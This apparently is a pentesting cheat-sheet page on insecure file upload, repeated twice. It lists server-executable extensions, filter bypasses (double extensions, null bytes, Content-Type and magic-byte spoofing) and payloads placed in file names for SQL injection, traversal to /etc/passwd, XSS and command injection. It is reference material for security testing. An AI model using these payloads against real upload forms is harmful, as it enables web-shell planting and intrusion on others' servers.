Insecure File Upload

Defaults extensions

PHP

.php
.php2
.php3
.php4
.php5
.php7
.pht
.shtml
.phps
.phar
.phpt
.pgif
.phtml
.phtm
.inc
.htaccess

ASP

.asp
.aspx
.cer
.asa
.ashx
.asmx
.axd
.cshtm
.cshtml
.rem
.soap

JSP

.jsp
.jspx
.jsw
.jspf
.jsv
.wss
.do
.action

Perl

.pl
.pm
.cgi
.lib

Coldfusion

.cfm
.cfml
.cfc
.dbm

Flash

.swf

Erland Yaws Web Server

.yaws

Bypasses

Double extensions

file.jpg.php
file.php.jpg
file.php.blah123jpg
file.png.php
file.png.Php5
file.php%00.png
file.php%0d%0a.png
file.php%0a.png
file.php\x00.png

Null byte

file.php%00.gif
file.php\x00.gif
file.php%00.png
file.php\x00.png
file.php%00.jpg
file.php\x00.jpg

Special characters

file.php......
file.php%20
file.php%0a
file.php%00
file.php%0d%0a
file.php/
file.php.\
file.
file.pHp5....
file.%E2%80%AEphp.jpg

Content-type Bypass

#Original name but different content-type
Content-Type: image/jpeg
Content-Type: image/gif
Content-Type: image/png

Magic bytes

#Sometimes applications identify file types based on their first signature bytes. Adding/replacing them in a file might trick the application
PNG: \x89PNG\r\n\x1a\n\0\0\0\rIHDR\0\0\x03H\0\xs0\x03[
JPG: \xff\xd8\xff
GIF: GIF87a
GIF: GIF8

Triple equal

/?file=shell.php    <-- Blocked
/?file===shell.php  <-- Bypassed

Filename Vulnerabilities:

#Time-Based SQLi Payloads
poc.js'(select*from(select(sleep(20)))a)+'.extension

#LFI Payloads
image.png../../../../../../../etc/passwd

#XSS Payloads
'"><img src=x onerror=alert(document.domain)>.extension

#File Traversal
../../../tmp/lol.png

#Command Injection
; sleep 10;

PreviousInsecure Direct Object Reference (IDOR)NextLocal File Inclusion (LFI)

Last updated 5 months ago

Was this helpful?

Insecure File Upload

Defaults extensions

PHP

.php
.php2
.php3
.php4
.php5
.php7
.pht
.shtml
.phps
.phar
.phpt
.pgif
.phtml
.phtm
.inc
.htaccess

ASP

.asp
.aspx
.cer
.asa
.ashx
.asmx
.axd
.cshtm
.cshtml
.rem
.soap

JSP

.jsp
.jspx
.jsw
.jspf
.jsv
.wss
.do
.action

Perl

.pl
.pm
.cgi
.lib

Coldfusion

.cfm
.cfml
.cfc
.dbm

Flash

.swf

Erland Yaws Web Server

.yaws

Bypasses

Double extensions

file.jpg.php
file.php.jpg
file.php.blah123jpg
file.png.php
file.png.Php5
file.php%00.png
file.php%0d%0a.png
file.php%0a.png
file.php\x00.png

Null byte

file.php%00.gif
file.php\x00.gif
file.php%00.png
file.php\x00.png
file.php%00.jpg
file.php\x00.jpg

Special characters

file.php......
file.php%20
file.php%0a
file.php%00
file.php%0d%0a
file.php/
file.php.\
file.
file.pHp5....
file.%E2%80%AEphp.jpg

Content-type Bypass

#Original name but different content-type
Content-Type: image/jpeg
Content-Type: image/gif
Content-Type: image/png

Magic bytes

#Sometimes applications identify file types based on their first signature bytes. Adding/replacing them in a file might trick the application
PNG: \x89PNG\r\n\x1a\n\0\0\0\rIHDR\0\0\x03H\0\xs0\x03[
JPG: \xff\xd8\xff
GIF: GIF87a
GIF: GIF8

Triple equal

/?file=shell.php    <-- Blocked
/?file===shell.php  <-- Bypassed

Filename Vulnerabilities:

#Time-Based SQLi Payloads
poc.js'(select*from(select(sleep(20)))a)+'.extension

#LFI Payloads
image.png../../../../../../../etc/passwd

#XSS Payloads
'"><img src=x onerror=alert(document.domain)>.extension

#File Traversal
../../../tmp/lol.png

#Command Injection
; sleep 10;

PreviousInsecure Direct Object Reference (IDOR)NextLocal File Inclusion (LFI)

Last updated 5 months ago

Was this helpful?